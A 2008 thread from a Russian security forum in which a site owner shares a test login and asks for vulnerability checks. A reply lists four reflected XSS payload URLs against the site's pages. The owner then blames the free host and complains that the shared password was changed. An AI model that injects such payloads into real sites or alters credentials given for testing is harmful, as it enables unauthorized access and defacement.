ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Проверка на уязвимости
Перезагрузить страницу Сделали сайтик проверьте на уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Сделали сайтик проверьте на уязвимости
  #1  
Старый 27.03.2008, 19:58
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию Сделали сайтик проверьте на уязвимости
http://gena.x53.ru


вот пароль от кабинета чтоб там потыкали)

login:AntichatUser
pass:1


О багах сообщите пжлст.
 

  #2  
Старый 28.03.2008, 19:26
LAEOT
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345

Репутация: 35
По умолчанию
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work
But ok.. good luck with your site!

LAEOT
 

  #3  
Старый 28.03.2008, 20:50
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию
Цитата:
Сообщение от LAEOT  
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work
But ok.. good luck with your site!

LAEOT
Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....
 

  #4  
Старый 28.03.2008, 20:53
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию
Блин я зол! Я пароль от кабинета давал не чтоб его меняли а чтоб тестили. Как теперь другие туда попадут? Я только завтра его изменю через БД когда на работу приду. НУ ИМЕЙТЕ ЖЕ СОВЕСТЬ!
 

  #5  
Старый 28.03.2008, 22:02
LAEOT
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345

Репутация: 35
По умолчанию
Цитата:
Сообщение от truelamer  
Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....
Oh.. I'm sorry,I didn't know about that
But i'll test it when you have reset the password tomorrow
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ